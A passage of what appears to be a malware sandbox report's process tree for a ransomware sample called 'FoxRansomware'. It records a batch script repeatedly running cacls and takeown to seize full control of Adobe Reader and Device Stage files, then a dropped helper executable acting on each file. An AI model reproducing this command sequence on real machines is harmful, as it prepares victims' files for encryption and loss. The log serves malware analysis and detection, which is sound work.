- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
    sOCkujKF.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4500
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_super.gif""
  2⤵
  PID:4516
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_super.gif" /E /G Admin:F /C
    3⤵
    PID:4568
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_super.gif"
    3⤵
    PID:1040
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "reviews_super.gif" -nobanner
    3⤵
    PID:4504
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
      sOCkujKF.exe -accepteula "reviews_super.gif" -nobanner
      4⤵
      PID:4592
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
    sOCkujKF.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:820
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\submission_history.gif""
  2⤵
  PID:4412
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\submission_history.gif" /E /G Admin:F /C
    3⤵
    PID:4480
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\submission_history.gif"
    3⤵
    PID:4544
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "submission_history.gif" -nobanner
    3⤵
    PID:4656
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
      sOCkujKF.exe -accepteula "submission_history.gif" -nobanner
      4⤵
      PID:4680
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
    sOCkujKF.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4648
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\CMap\Identity-H""
  2⤵
  PID:4672
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\CMap\Identity-H" /E /G Admin:F /C
    3⤵
    PID:4612
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\CMap\Identity-H"
    3⤵
    PID:4748
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "Identity-H" -nobanner
    3⤵
    PID:4772
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
      sOCkujKF.exe -accepteula "Identity-H" -nobanner
      4⤵
      PID:4792
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
    sOCkujKF.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4764
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-Regular.otf""
  2⤵
  PID:4800
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-Regular.otf" /E /G Admin:F /C
    3⤵
    PID:4676
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-Regular.otf"
    3⤵
    - Modifies file permissions
    PID:4828
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "MinionPro-Regular.otf" -nobanner
    3⤵
    PID:4732
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
      sOCkujKF.exe -accepteula "MinionPro-Regular.otf" -nobanner
      4⤵
      PID:4740
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
    sOCkujKF.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1980
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\ZY______.PFB""
  2⤵
  PID:4868
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\ZY______.PFB" /E /G Admin:F /C
    3⤵
    PID:4824
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\ZY______.PFB"
    3⤵
    PID:4780
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "ZY______.PFB" -nobanner
    3⤵
    PID:4896
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
      sOCkujKF.exe -accepteula "ZY______.PFB" -nobanner
      4⤵
      PID:4924
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
    sOCkujKF.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4840
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt32.clx""
  2⤵
  PID:4956
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt32.clx" /E /G Admin:F /C
    3⤵
    PID:4728
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt32.clx"
    3⤵
    PID:4912
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "brt32.clx" -nobanner
    3⤵
    PID:5016
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
      sOCkujKF.exe -accepteula "brt32.clx" -nobanner
      4⤵
      PID:5024
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
    sOCkujKF.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2524
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa.fca""
  2⤵
  PID:5012
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa.fca" /E /G Admin:F /C
    3⤵
    PID:2856
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa.fca"
    3⤵
    PID:5048
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "usa.fca" -nobanner
    3⤵
    PID:5020
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
      sOCkujKF.exe -accepteula "usa.fca" -nobanner
      4⤵
      PID:4900
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
    sOCkujKF.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:5108
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CROATIAN.TXT""
  2⤵
  PID:2600
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CROATIAN.TXT" /E /G Admin:F /C
    3⤵
    PID:368
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CROATIAN.TXT"
    3⤵
    - Modifies file permissions
    PID:5096
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "CROATIAN.TXT" -nobanner
    3⤵
    PID:4968
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
      sOCkujKF.exe -accepteula "CROATIAN.TXT" -nobanner
      4⤵
      PID:4876
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
    sOCkujKF.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1744
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1251.TXT""
  2⤵
  PID:3484
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1251.TXT" /E /G Admin:F /C
    3⤵
    PID:3964
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1251.TXT"
    3⤵
    PID:4060
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "CP1251.TXT" -nobanner
    3⤵
    PID:3192
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
      sOCkujKF.exe -accepteula "CP1251.TXT" -nobanner
      4⤵
      PID:5068
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
    sOCkujKF.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3200
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\background.png""
  2⤵
  PID:2464
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\background.png" /E /G Admin:F /C
    3⤵
    PID:3756
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\background.png"
    3⤵
    PID:3108
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "background.png" -nobanner
    3⤵
    PID:572
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
      sOCkujKF.exe -accepteula "background.png" -nobanner
      4⤵
      PID:3664
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
    sOCkujKF.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2248
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\es-ES\resource.xml""
  2⤵
  PID:3724
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\es-ES\resource.xml" /E /G Admin:F /C
    3⤵
    PID:3368
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\es-ES\resource.xml"
    3⤵
    PID:2864
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "resource.xml" -nobanner
    3⤵
    PID:3688
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
      sOCkujKF.exe -accepteula "resource.xml" -nobanner
      4⤵
      PID:3584
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
    sOCkujKF.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3968
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\it-IT\resource.xml""
  2⤵
  PID:1544
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\it-IT\resource.xml" /E /G Admin:F /C
    3⤵
    PID:996
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\it-IT\resource.xml"
    3⤵
    PID:4028
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "resource.xml" -nobanner
    3⤵
    PID:3172
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
      sOCkujKF.exe -accepteula "resource.xml" -nobanner
      4⤵
      PID:1520
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
    sOCkujKF.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2372
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\fr-FR\resource.xml""
  2⤵
  PID:3876
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\fr-FR\resource.xml" /E /G Admin:F /C
    3⤵
    PID:1000
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\fr-FR\resource.xml"
    3⤵
    PID:1404
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "resource.xml" -nobanner
    3⤵
    PID:3836
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
      sOCkujKF.exe -accepteula "resource.xml" -nobanner
      4⤵
      PID:3776
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
    sOCkujKF.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3580
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\ja-JP\resource.xml""
  2⤵
  PID:3760
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\ja-JP\resource.xml" /E /G Admin:F /C
    3⤵
    PID:2624
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\ja-JP\resource.xml"
    3⤵
    - Modifies file permissions
    PID:1176
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "resource.xml" -nobanner
    3⤵
    PID:1020
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
      sOCkujKF.exe -accepteula "resource.xml" -nobanner
      4⤵
      PID:3672
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
    sOCkujKF.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1396
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\de-DE\resource.xml""
  2⤵
  PID:3640
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\de-DE\resource.xml" /E /G Admin:F /C
    3⤵
    PID:3496
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\de-DE\resource.xml"
    3⤵
    PID:2056
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "resource.xml" -nobanner
    3⤵
    PID:3916
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
      sOCkujKF.exe -accepteula "resource.xml" -nobanner
      4⤵
      PID:1240
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
    sOCkujKF.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:208
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\es-ES\resource.xml""
  2⤵
  PID:204
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\es-ES\resource.xml" /E /G Admin:F /C
    3⤵
    PID:3532
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\es-ES\resource.xml"
    3⤵
    PID:3884
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "resource.xml" -nobanner
    3⤵
    PID:2052
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
      sOCkujKF.exe -accepteula "resource.xml" -nobanner
      4⤵
      PID:3808
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
    sOCkujKF.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3956
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\superbar.png""
  2⤵
  PID:3660
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\superbar.png" /E /G Admin:F /C
    3⤵
    PID:3548
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\superbar.png"
    3⤵
    - Modifies file permissions
    PID:2272
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "superbar.png" -nobanner
    3⤵
    PID:3676
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
      sOCkujKF.exe -accepteula "superbar.png" -nobanner
      4⤵
      PID:968
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
    sOCkujKF.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1708
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\resource.xml""
  2⤵
  PID:4036
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\resource.xml" /E /G Admin:F /C
    3⤵
    PID:3384
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\resource.xml"
    3⤵
    - Modifies file permissions
    PID:2192
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "resource.xml" -nobanner
    3⤵
    PID:3436
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
      sOCkujKF.exe -accepteula "resource.xml" -nobanner
      4⤵
      PID:3544
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
    sOCkujKF.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1356
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\cryptocme2.sig""
  2⤵
  PID:3888
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\cryptocme2.sig" /E /G Admin:F /C
    3⤵
    PID:4180
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\cryptocme2.sig"
    3⤵
    - Modifies file permissions
    PID:3328
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "cryptocme2.sig" -nobanner
    3⤵
    PID:2676
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
      sOCkujKF.exe -accepteula "cryptocme2.sig" -nobanner
      4⤵
      PID:3928
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
    sOCkujKF.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3180
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\pmd.cer""
  2⤵
  PID:880
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\pmd.cer" /E /G Admin:F /C
    3⤵
    PID:3296
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\pmd.cer"
    3⤵
    - Modifies file permissions
    PID:3268
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "pmd.cer" -nobanner
    3⤵
    PID:2800
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
      sOCkujKF.exe -accepteula "pmd.cer" -nobanner
      4⤵
      PID:1068
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
    sOCkujKF.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3324
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\email_initiator.gif""
  2⤵
  PID:1580
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\email_initiator.gif" /E /G Admin:F /C
    3⤵
    PID:3104
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\email_initiator.gif"
    3⤵
    PID:3084
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "email_initiator.gif" -nobanner
    3⤵
    PID:2348
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
      sOCkujKF.exe -accepteula "email_initiator.gif" -nobanner
      4⤵
      PID:2988
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
    sOCkujKF.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3364
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\pdf.gif""
  2⤵
  PID:4100
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\pdf.gif" /E /G Admin:F /C
    3⤵
    PID:2752
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\pdf.gif"
    3⤵
    - Modifies file permissions
    PID:2084
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "pdf.gif" -nobanner
    3⤵
    PID:1180
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
      sOCkujKF.exe -accepteula "pdf.gif" -nobanner
      4⤵
      PID:1760
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
    sOCkujKF.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4148
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_issue.gif""
  2⤵
  PID:668
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_issue.gif" /E /G Admin:F /C
    3⤵
    PID:3316
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_issue.gif"
    3⤵
    - Modifies file permissions
    PID:2888
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "server_issue.gif" -nobanner
    3⤵
    PID:2124
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
      sOCkujKF.exe -accepteula "server_issue.gif" -nobanner
      4⤵
      PID:3152
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
    sOCkujKF.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2724
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOnNotificationInAcrobat.gif""
  2⤵
  PID:2780
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOnNotificationInAcrobat.gif" /E /G Admin:F /C
    3⤵
    PID:2708
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOnNotificationInAcrobat.gif"
    3⤵
    - Modifies file permissions
    PID:3572
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "turnOnNotificationInAcrobat.gif" -nobanner
    3⤵
    PID:3804
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
      sOCkujKF.exe -accepteula "turnOnNotificationInAcrobat.gif" -nobanner
      4⤵
      PID:896
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
    sOCkujKF.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4084
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd.otf""
  2⤵
  PID:4032
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd.otf" /E /G Admin:F /C
    3⤵
    PID:4128
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd.otf"
    3⤵
    PID:3684
- - C:\Windows\SysWOW64\cmd.exe
